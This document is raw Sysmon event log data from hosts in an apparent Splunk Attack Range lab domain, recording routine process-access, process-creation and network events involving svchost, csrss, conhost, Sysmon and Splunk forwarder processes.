08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.350{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.351{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.343{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57433-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000809988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.913{0C1E0330-F7C7-60EB-D379-00000000D001}2464388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.725{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.725{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.726{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.663{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF7961222503384415DA6E1F05D6B19A,SHA256=B8BB82F9C55EB4E6FD55C81C673E3AC86078EA53CD91A6B297C1C8FCCEC7D217,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:27.111{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A417274B39DF4153A3BED39BCFAB126,SHA256=836BC4ED55BEE01BE73CD1BEAEED0B51708F50111AAF61ECE75E7ACDDAC5EECE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.194{0C1E0330-F7C7-60EB-D279-00000000D001}15161476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 